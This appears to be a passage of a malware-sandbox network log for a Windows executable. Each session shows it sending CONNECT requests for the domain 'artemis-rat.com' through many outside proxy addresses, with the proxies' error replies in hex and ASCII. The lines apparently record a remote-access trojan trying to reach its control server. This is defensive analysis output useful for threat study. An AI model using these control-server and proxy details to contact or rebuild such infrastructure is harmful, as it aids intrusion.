                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.366755962 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            130192.168.2.550290104.20.235.179803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.134278059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.288789034 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            131192.168.2.550224121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.137259007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            132192.168.2.550295104.20.75.31803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.141138077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.295747995 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            133192.168.2.550296104.20.225.218803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.143049955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.297343016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            134192.168.2.55022781.250.223.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.159646034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.471532106 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            135192.168.2.55029451.81.186.179586303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.173932076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.654834032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.217360020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.326750040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702265024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092763901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405282974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905210018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.904978991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            136192.168.2.550208103.63.190.3780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.176321983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.542819977 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            137192.168.2.550322104.21.80.83803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.179914951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.334521055 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            138192.168.2.550283184.178.172.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.204816103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            139192.168.2.550330104.19.109.209803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.205452919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.359724045 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            140192.168.2.550329104.16.105.207803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.205738068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.360162973 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            141192.168.2.550335104.20.75.69803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.205743074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.359771967 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            142192.168.2.55027798.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.208151102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            143192.168.2.550340104.16.81.76803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.212833881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
